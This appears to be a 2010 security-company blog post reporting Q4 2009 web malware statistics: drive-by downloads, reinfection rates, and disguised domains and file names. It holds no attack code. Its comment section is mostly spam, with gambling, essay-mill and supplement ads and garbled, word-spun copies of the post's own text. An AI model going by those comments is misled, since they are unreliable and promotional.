Tuesday, January 26, 2010

Q4'09 web-based malware data and trends

Ed. Note: The data in this post is drawn primarily from Dasient's proprietary malware analysis platform, which gathers data on web-based malware attacks from across the web, and in the last year has been used to help tens of thousands of site owners address their web-based malware issues.

As we reported last quarter, the way malware is being distributed is undergoing a fundamental shift, with more attackers focusing on "drive-by downloads" from legitimate sites that have been compromised, or from sites designed specifically for malicious purposes. In nearly all the variations on this kind of attack, no user action is required for the infection to occur, beyond loading the site in a browser -- and there are very few signs that malicious code has been downloaded.

There is perhaps no better illustration of this shift than the way malware was employed in the recent attack on Google and several other companies. One of the components of the attack involved spear-phishing one or more Google employees, with an aim of driving them to a site that then exploited a zero-day vulnerability in Internet Explorer 6 to download malware to those employees' computers. In previous years, such an attack would have solely made use of a malicious email attachment to compromise the target's computer; now, attackers are clearly opting to employ multiple vectors, including web-based methods.

Looking at the data for Q4'09

Based on the telemetry data we've gathered from the web, we estimate that more than 560,000 sites and approximately 5.5 million pages were infected in Q4'09, compared with more than 640,000 sites and 5.8 million pages in Q3'09. By the end of the year, we had identified more than 100,000 web-based malware infections.

Also in Q4'09, the infections on newly compromised sites of 10 pages or more spread to an average of 24% of those sites' pages, up from 19 percent the previous quarter. This increase helps account for the smaller drop in the number of infected pages for the quarter, relative to the drop in infected sites. In other words, we saw a more significant drop in the number of infected sites than we did in the number of infected pages because each infection tended to spread to a larger number of pages on each site.

Finally, we saw a reinfection rate of 42 percent for the quarter (compared with 39 percent in Q3'09), meaning that more than four of every 10 sites infected in the quarter were reinfected within a space of three months. And, of course, with each infection the site is likely to suffer a loss of traffic, a decline in revenue, and damage to brand equity.

While we clearly saw a slight dip in some of the key metrics in the quarter (and, more specifically, as we neared the end of the year), the macro trend still points to a steady and significant increase in this kind of activity. To cite just one indicator: The number of infected pages for the quarter, 5.5 million, is a substantial increase from data published by Microsoft in April 2009, which pegged the number of infected pages per quarter at a little more than 3 million.

Attackers getting smarter

Like most other kinds of attackers, purveyors of web-based malware have long since adopted basic social engineering techniques to maximize their chances of remaining undetected as they infect endpoints. We saw plenty of evidence confirming that trend in Q4'09: For example, the most common domains being sourced in the download of a malicious file included innocuous-looking names like "google-query.com," "netlinkenterprises.com," and "starktourism.com." Similarly, the file names most often used in drive-by downloads included things like "setup.exe," "update.exe" (which was used in the Google attack), and "install_flash_player.exe."

But we also saw some evidence that attackers are responding directly to industry efforts to curb the spread of web-based malware. One interesting example can be found in the average number of extra processes started when a drive-by download is initiated. In previous years, a drive-by download would often initiate 10 or more extra processes, ostensibly in an attempt to maximize the return from each infected endpoint. In response, the search providers and anti-virus vendors who scan the web for infected sites began using the number of extra processes initiated as a signal that the webpage might be malicious. But in Q4'09, the average number of extra processes initiated was just 2.8 -- enough for a downloader and perhaps one or two pieces of malware. Clearly, attackers are getting smarter about the way they structure their attacks, opting for a smaller fingerprint on an infected machine in exchange for a greater likelihood of evading detection.

Structural vulnerabilities still being exploited

It stands to reason that the increasing complexity in and interoperability between websites and web applications has played a significant role in the rise of web-based malware. After all, the more dynamic and sophisticated your pages or applications are, the more vulnerabilities there will be for attackers to exploit. The data for Q4'09 certainly bears that out: .php, .asp, and .aspx (all file types associated with dynamic web content) accounted for 55 percent of all compromised URLs in the quarter.

Of course, a closer look at the data reveals that file types associated with static pages, such as .html, .htm, and .shtml, accounted for 39.6 percent of the compromised URLs for the quarter. This suggests that attackers are still focused in no small part on exploiting structural vulnerabilities in the web to compromise legitimate sites -- vulnerabilities like sourced-in third-party content or applications; user-added content like comments, links, photos, and other files; and syndicated ad networks, among other things. There are no simple solutions for closing these kinds of vulnerabilities, something that all site owners who want to avoid being infected -- and potentially infecting their users and being blacklisted -- should bear in mind when considering the protections they employ.

Keeping your site safe

If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your websites, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed at http://twitter.com/dasient for all the latest in web-based malware and general security news.


  1. This one is too good. thanks for sharing.
    my Blogs: cityville cheats | how to get taller

  2. I like this blog and it is well or discuss about technology, websites,etc.....

    http://www.knowifagirllikesyou.com |

  3. Thanks so much for this! This is exactly what I was looking for
    My Blog : how to make money online | diets that work

  4. The particular information and facts I actually obtained in this website is a suitable confirmation that it's nowadays attainable to educate everyone and be abreast of latest information.


  5. High PR Backlinks
    I am happy to find your distinguished way of writing the post. Now you make it easy for me to understand and implement the concept. Thank you for the post

  6. If you're a performing human and you'd similar to see writer roughly how Dasient WAM can ameliorate protect your websites, occasion here. If you're a web hosting businessperson and you'd similar to discover nigh partnership opportunities with Dasient, alter out this diplomat. And no concern who you are, satisfy be certain to contain out our Twirp work at http://twitter.com/dasient for all the last in web-based malware and mass safeguard news.

    Computer Parts Store

  7. If you're a performing human and you'd analogous to see author roughly how Dasient WAM can ameliorate protect your websites, occurrence here. If you're a web hosting capitalist and you'd twin to name left partnership opportunities with Dasient, vary out this diplomat. And no vexation who you are, fulfill be confident to comprise out our Emit product at dasient for all the measure in web-based malarkey and aggregation pass programmer.

    Computer Stores

  8. If you're a performing weak and you'd analogous to see communicator roughly how Dasient WAM can ameliorate protect your websites, event here. If you're a web hosting capitalist and you'd match to sept paw partnership opportunities with Dasient, depart out this official. And no vexation who you are, fulfil be positive to comprise out our Release set at dasient for all the value in web-based malarkey and grouping reach programmer.

    Computer Store

  9. It is a pleasure reading for me... I like it so much... Please Keep writing... latest news today

  10. Really enjoyed your post while reading. I loved the post quality of your website. Thanks for this wonderful post.

    Banglore international school

  11. In the same time well-bred people who attend colleges or even universities find it problematic sometimes to prepare a logical and critical task on a given topic. For those students who want to become sophisticated ones, this writing company proposes a reasonable help when i buy narrative essay at Papersmart.net on time. We make well-organized materials for anyone who needs an outstanding support on their own endeavors.

  12. Wonderful content and excellent way of presenting this topic. Thank you very much for the details provided by you.tata steel dealers

  13. I have truly learned so much from this amazing site. This is actually huge information. who can do coursework for me buy urgent coursework

  14. This comment has been removed by the author.

  15. Well. The most well-known issue is that individuals are running old stuff on their PCs that do not have the important security patches introduced. A few individuals have it like this reason they are languid, yet most haven't got their frameworks overhauled essentially cause they don't have a clue about that their PCs are being utilized by others. For more ideas with professional you can move to custom thesis writing service from web .

  16. You completed certain reliable points there. I did a search on the subject and found nearly all persons will agree with your blog.
    uk assignment writing

  17. bandar casino terpercaya harus anda cari dengan sungguh – sungguh, karena di indonesia sendiri banyak agen casino online yang menawarkan berbagai promosi menarik tapi menipu membernya. agen judi terbaik versi beberapa orang yang menjalani taruhan online sudah saya kantongi datanya dan disini saya akan memberikan kepada anda rincian agen casino sbobet yang bisa dipercaya dan dapat anda jadikan langganan taruhan online. agen judi bola ini merupakan penyedia berbagai produk judi online populer dan anda dapat memainkan sesuka hati yaitu di hokybet.net. mainkan taruhan di hokybet.net dengan suka cita lantaran banyak promo menarik yang bisa anda bawa pulang. perjudian online memang memasuki tahap berkembang pesat, yang mana dengan mudah bisa anda akses dan mainkan dimana saja. hal ini didukung pula dengan internet yang semakin merata di kawasan indonesia. jadi mau taruhan apapun bisa mendapatkannya secara instan. prediksi informatif dan aktual yang anda inginkan untuk menunjang taruhan online, dapat anda temui di agen bola terbaik. bahkan anda bisa berlangganan di agen sbobet melalui akun yang anda buat di situs jagobetting agen judi bola. tunggu apa lagi, segera registrasi sebelum hadiah besar yang ditawarkan oleh bandar judi itu ditutup. mendaftar sekarang dan dapatkan bonus deposit dan cashback besar dari bandar judi bola online indonesia ini. nikmati taruhan menggunakan uang aslinya dan menangkan hadiahnya

  18. hello sir, kedatanagn me or my visit is to see and read the contents of the page that hosts created, after the I observe teryata very interesting article which hosts publish this, some did not Seya understand, but I am quite happy with what I can right here , please visit her back here.
    obat suplemen pria.
    obat nafu seksual.
    pro extender.